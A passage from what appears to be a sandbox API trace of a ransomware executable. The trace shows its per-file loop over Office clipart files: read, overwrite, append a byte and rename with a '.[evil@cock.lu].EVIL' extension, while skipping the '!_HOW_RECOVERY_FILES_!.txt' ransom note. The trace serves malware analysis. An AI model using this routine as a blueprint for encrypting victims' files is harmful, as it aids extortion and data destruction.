Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.845] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.845] __uncaught_exception () returned 0x84b1160800 [0151.845] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.845] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf.[evil@cock.lu].evil")) returned 1 [0151.846] ??_V@YAXPEAX@Z () returned 0x1 [0151.849] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF", dwFileAttributes=0x200) returned 0 [0151.849] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.849] wcsstr (_Str="J0200383.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.849] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 69 [0151.849] wcscmp (_String1="J0200383.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.849] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200383.WMF") returned 0x0 [0151.849] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF") returned 0x45 [0151.849] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.851] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5398, lpOverlapped=0x0) returned 1 [0151.853] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.853] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.853] _errno () returned 0x84b1160840 [0151.853] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.853] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x53a0, lpOverlapped=0x0) returned 1 [0151.854] CloseHandle (hObject=0x1a8) returned 1 [0151.854] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.854] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.854] __uncaught_exception () returned 0x84b1160800 [0151.854] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.854] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf.[evil@cock.lu].evil")) returned 1 [0151.855] ??_V@YAXPEAX@Z () returned 0x1 [0151.857] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF", dwFileAttributes=0x200) returned 0 [0151.858] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.858] wcsstr (_Str="J0200467.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.858] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 69 [0151.858] wcscmp (_String1="J0200467.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.858] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200467.WMF") returned 0x0 [0151.858] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 0x45 [0151.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.859] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x366e, lpOverlapped=0x0) returned 1 [0151.862] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.862] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.862] _errno () returned 0x84b1160840 [0151.862] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.862] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3680, lpOverlapped=0x0) returned 1 [0151.862] CloseHandle (hObject=0x1a8) returned 1 [0151.862] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.863] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.863] __uncaught_exception () returned 0x84b1160800 [0151.863] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.863] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf.[evil@cock.lu].evil")) returned 1 [0151.864] ??_V@YAXPEAX@Z () returned 0x1 [0151.867] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF", dwFileAttributes=0x200) returned 0 [0151.867] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.867] wcsstr (_Str="J0200521.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.867] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 69 [0151.867] wcscmp (_String1="J0200521.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.867] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200521.WMF") returned 0x0 [0151.867] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 0x45 [0151.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.870] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x273e, lpOverlapped=0x0) returned 1 [0151.884] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.884] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.884] _errno () returned 0x84b1160840 [0151.884] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.884] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2740, lpOverlapped=0x0) returned 1 [0151.884] CloseHandle (hObject=0x1a8) returned 1 [0151.885] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.885] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.885] __uncaught_exception () returned 0x84b1160800 [0151.885] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.885] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf.[evil@cock.lu].evil")) returned 1 [0151.886] ??_V@YAXPEAX@Z () returned 0x1 [0151.890] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF", dwFileAttributes=0x200) returned 0 [0151.890] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.890] wcsstr (_Str="J0200611.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.890] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 69 [0151.890] wcscmp (_String1="J0200611.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.890] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0200611.WMF") returned 0x0 [0151.890] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 0x45 [0151.890] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.892] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf36, lpOverlapped=0x0) returned 1 [0151.896] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.896] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.896] _errno () returned 0x84b1160840 [0151.896] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.896] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf40, lpOverlapped=0x0) returned 1 [0151.896] CloseHandle (hObject=0x1a8) returned 1 [0151.896] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.897] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.897] __uncaught_exception () returned 0x84b1160800 [0151.897] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.897] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf.[evil@cock.lu].evil")) returned 1 [0151.898] ??_V@YAXPEAX@Z () returned 0x1 [0151.901] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF", dwFileAttributes=0x200) returned 0 [0151.902] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.902] wcsstr (_Str="J0202045.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.902] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 69 [0151.902] wcscmp (_String1="J0202045.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.902] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0202045.JPG") returned 0x0 [0151.902] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 0x45 [0151.902] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.904] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa50e, lpOverlapped=0x0) returned 1 [0151.908] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.908] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.908] _errno () returned 0x84b1160840 [0151.908] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.908] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xa520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa520, lpOverlapped=0x0) returned 1 [0151.908] CloseHandle (hObject=0x1a8) returned 1 [0151.908] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.909] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.909] __uncaught_exception () returned 0x84b1160800 [0151.909] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.909] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg.[evil@cock.lu].evil")) returned 1 [0151.910] ??_V@YAXPEAX@Z () returned 0x1 [0151.914] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG", dwFileAttributes=0x200) returned 0 [0151.914] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.914] wcsstr (_Str="J0211981.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.914] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 69 [0151.914] wcscmp (_String1="J0211981.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.914] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0211981.WMF") returned 0x0 [0151.914] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 0x45 [0151.914] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.916] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6e74, lpOverlapped=0x0) returned 1 [0151.923] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.923] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.923] _errno () returned 0x84b1160840 [0151.923] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.923] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x6e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6e80, lpOverlapped=0x0) returned 1 [0151.923] CloseHandle (hObject=0x1a8) returned 1 [0151.923] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.924] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.924] __uncaught_exception () returned 0x84b1160800 [0151.924] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.924] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf.[evil@cock.lu].evil")) returned 1 [0151.925] ??_V@YAXPEAX@Z () returned 0x1 [0151.929] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF", dwFileAttributes=0x200) returned 0 [0151.929] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.929] wcsstr (_Str="J0212299.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.929] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 69 [0151.929] wcscmp (_String1="J0212299.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.929] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0212299.WMF") returned 0x0 [0151.929] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF") returned 0x45 [0151.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.931] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x180e, lpOverlapped=0x0) returned 1 [0151.937] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.937] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.937] _errno () returned 0x84b1160840 [0151.937] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.937] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1820, lpOverlapped=0x0) returned 1 [0151.937] CloseHandle (hObject=0x1a8) returned 1 [0151.937] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.937] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.938] __uncaught_exception () returned 0x84b1160800 [0151.938] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.938] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212299.wmf.[evil@cock.lu].evil")) returned 1 [0151.939] ??_V@YAXPEAX@Z () returned 0x1 [0151.943] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212299.WMF", dwFileAttributes=0x200) returned 0 [0151.943] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.943] wcsstr (_Str="J0212601.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.943] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 69 [0151.943] wcscmp (_String1="J0212601.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.943] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0212601.WMF") returned 0x0 [0151.943] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 0x45 [0151.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.946] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x25cc, lpOverlapped=0x0) returned 1 [0151.951] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.951] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.951] _errno () returned 0x84b1160840 [0151.951] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.951] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x25e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x25e0, lpOverlapped=0x0) returned 1 [0151.951] CloseHandle (hObject=0x1a8) returned 1 [0151.951] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.952] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.952] __uncaught_exception () returned 0x84b1160800 [0151.952] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.952] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft 